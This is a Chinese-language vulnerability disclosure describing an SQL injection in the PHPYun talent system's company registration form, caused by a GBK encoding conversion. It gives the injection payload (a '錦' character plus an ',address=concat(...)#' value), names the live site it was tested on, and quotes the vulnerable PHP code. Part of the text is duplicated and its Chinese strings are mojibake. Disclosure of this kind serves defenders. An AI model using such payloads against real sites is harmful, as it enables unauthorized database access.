VULHUB ™

### 简要描述： PHP云人才系统SQL注入，官网测试。 ### 详细说明： PHP云人才系统 企业用户注册页面 编码转换导致的SQL注入: ``` http://www.hr135.com/index.php?m=register&usertype=2 ``` ``` 公司名称：錦 公司地址：,address=注入的SQL，这里用,address=concat(user(),0x0a,version())# ``` 如下图： [<img src="https://images.seebug.org/upload/201411/0717111684118f0001a325ba5208e9e74742c6ad.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0717111684118f0001a325ba5208e9e74742c6ad.png) 点击立即注册，注册成功后进入"企业信息页面",可以看到数据显示在"公司地址"里面, 如下图： [<img src="https://images.seebug.org/upload/201411/0717163303b83e6838b38271c6a33b54ff12ef4b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0717163303b83e6838b38271c6a33b54ff12ef4b.png) 对应的代码为： ``` model/register.class.php 63 function regsave_action(){ 64 $_POST=$this->post_trim($_POST); 65 $_POST['username']=iconv("utf-8","gbk",$_POST['username']); 66 $_POST['unit_name']=iconv("utf-8","gbk",$_POST['unit_name']); //...

### 简要描述： PHP云人才系统SQL注入，官网测试。 ### 详细说明： PHP云人才系统 企业用户注册页面 编码转换导致的SQL注入: ``` http://www.hr135.com/index.php?m=register&usertype=2 ``` ``` 公司名称：錦 公司地址：,address=注入的SQL，这里用,address=concat(user(),0x0a,version())# ``` 如下图： [<img src="https://images.seebug.org/upload/201411/0717111684118f0001a325ba5208e9e74742c6ad.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0717111684118f0001a325ba5208e9e74742c6ad.png) 点击立即注册，注册成功后进入"企业信息页面",可以看到数据显示在"公司地址"里面, 如下图： [<img src="https://images.seebug.org/upload/201411/0717163303b83e6838b38271c6a33b54ff12ef4b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0717163303b83e6838b38271c6a33b54ff12ef4b.png) 对应的代码为： ``` model/register.class.php 63 function regsave_action(){ 64 $_POST=$this->post_trim($_POST); 65 $_POST['username']=iconv("utf-8","gbk",$_POST['username']); 66 $_POST['unit_name']=iconv("utf-8","gbk",$_POST['unit_name']); // 这里对输入的‘錦’做了转化，引入了'\' 67 $_POST['address']=iconv("utf-8","gbk",$_POST['address']); 68 if(trim($_POST['password'])&&trim($_POST['password'])!=trim($_POST['passconfirm'])){ 69 echo "8##�����������벻һ�£�";die; 70 } 71 if(!$this->CheckRegUser($_POST['username'])){ 72 echo "8##�û������������ַ���";die; 73 } 74 if(!$this->CheckRegEmail($_POST['email'])){ 75 echo "8##Email��ʽ���淶��";die; 76 } 77 if($_COOKIE['uid']!=""&&$_COOKIE['username']!=""){ 78 echo "8##���Ѿ���¼�ˣ�";die; 79 } 80 $usertype=$_POST['usertype']; 81 if(strstr($this->config['code_web'],'ע����Ա')){ 82 if(md5($_POST['authcode'])!=$_SESSION['authcode']){ 83 echo "8##��֤��������";die; 84 } 85 } 86 if($_POST['username']!=""){ 87 $nid = $this->obj->DB_select_once("member","`username`='".$_POST['username']."' or `email`='".$_POST['email']."'"); 88 if(is_array($nid)){ 89 echo "8##�˻����������Ѵ��ڣ�";die; 90 } 91 if($_POST['usertype']=='2'){ 92 if($this->config['com_enforce_mobilecert']!='1'){ 93 unset($_POST['moblie']); 94 } 95 96 $satus = $this->config['com_status']; 97 } 98 if($this->config['sy_uc_type']=="uc_center"){ 99 $this->obj->uc_open(); 100 $uid=uc_user_register($_POST['username'],$_POST['password'],$_POST['email']); 101 if($uid<=0){ 102 echo "8##�������Ѵ��ڣ�";die; 103 }else{ 104 list($uid,$username,$password,$email,$salt)=uc_user_login($_POST['username'],$_POST['password']); 105 $pass = md5(md5($_POST['password']).$salt); 106 $ucsynlogin=uc_user_synlogin($uid); 107 } 108 }elseif($this->config['sy_pw_type']=="pw_center"){ 109 include(APP_PATH."/api/pw_api/pw_client_class_phpapp.php"); 110 $username=$username; 111 $password=$_POST['password']; 112 $email=$_POST['email']; 113 $pw=new PwClientAPI($username,$password,$email); 114 $pwuid=$pw->register(); 115 $salt = substr(uniqid(rand()), -6); 116 $pass = md5(md5($password).$salt); 117 }else{ 118 $salt = substr(uniqid(rand()), -6); 119 $pass = md5(md5($_POST['password']).$salt); 120 } 121 $ip = $this->obj->fun_ip_get(); 122 $data['username']=$_POST['username']; 123 $data['password']=$pass; 124 $data['moblie']=$_POST['moblie']; 125 $data['email']=$_POST['email']; 126 $data['usertype']=$_POST['usertype']; 127 $data['status']=$satus; 128 $data['salt']=$salt; 129 $data['reg_date']=time(); 130 $data['reg_ip']=$ip; 131 $data['qqid']=$_SESSION['qq']['openid']; 132 $data['sinaid']=$_SESSION['sinaid']; 133 $userid=$this->obj->insert_into("member",$data); 134 if(!$userid){ 135 $user_id = $this->obj->DB_select_once("member","`username`='".$_POST['username']."'","`uid`"); 136 $userid = $user_id['uid']; 137 } 138 if($userid){ 139 $this->unset_cookie(); 140 if($this->config[sy_pw_type]=="pw_center"){ 141 $this->obj->DB_update_all("member","`pwuid`='".$pwuid."'","`uid`='".$userid."'"); 142 } 143 if($_POST['usertype']=="1"){ 144 $table = "member_statis"; 145 $table2 = "resume"; 146 $value="`uid`='".$userid."'"; 147 $value2 = "`uid`='".$userid."',`email`='".$_POST['email']."',`telphone`='".$_POST['moblie']."'"; 148 }elseif($_POST['usertype']=="2"){ 149 $table = "company_statis"; 150 $table2 = "company"; 151 $value="`uid`='".$userid."',".$this->rating_info(); 152 $value2 = "`uid`='".$userid."',`linkmail`='".$_POST['email']."',`name`='".$_POST['unit_name']."',`linktel`='".$_POST['moblie']."',`address`='".$_POST['address']."'"; // ********这里将转码引入的'\'带入SQL，$_POST['address']即可注入代码。 153 } 154 $this->obj->DB_insert_once($table,$value); 155 $this->obj->DB_insert_once($table2,$value2); 156 $this->obj->DB_insert_once("friend_info","`uid`='".$userid."',`nickname`='".$_POST['username']."',`usertype`='".$_POST['usertype']."'"); 157 if($_POST['usertype']=="1"){ 158 if($this->config['user_status']=="1"){ 159 $randstr=rand(10000000,99999999); 160 $base=base64_encode($userid."|".$randstr."|".$this->config['coding']); 161 $data_cert['type']="cert"; 162 $data_cert['email']=$_POST['email']; 163 $data_cert['url']="<a href='".$this->config['sy_weburl']."/index.php?m=qqconnect&c=mcert&id=".$base."'>������֤</a>"; 164 $data_cert['date']=date("Y-m-d"); 165 $this->send_msg_email($data_cert); 166 $msg = "7##�ʺż����ʼ��ѷ��͵������䣬���ȼ��"; 167 }else{ 168 $this->add_cookie($userid,$_POST['username'],$salt,$_POST['email'],$pass,$usertype); 169 $this->regemail($_POST); 170 $msg = 1; 171 } 172 }elseif($usertype=="2"){ 173 $this->regemail($_POST); 174 if($this->config['com_status']!="1"){ 175 $msg = "7##ע���ɹ�,���ȴ�����Ա����"; 176 }else{ 177 $msg = 1; 178 $this->add_cookie($userid,$_POST['username'],$salt,$_POST['email'],$pass,$usertype); 179 } 180 } 181 echo $msg;die; 182 }else{ 183 echo "8##ע��ʧ�ܣ�";die; 184 } 185 }else{ 186 echo "8##�û�������Ϊ�գ�";die; 187 } 188 } ``` 这样拼接出的SQL语句为： [<img src="https://images.seebug.org/upload/201411/07172121d273e49cfa48b6ab9d4c13465ff3a5ff.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/07172121d273e49cfa48b6ab9d4c13465ff3a5ff.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201411/0717163303b83e6838b38271c6a33b54ff12ef4b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0717163303b83e6838b38271c6a33b54ff12ef4b.png)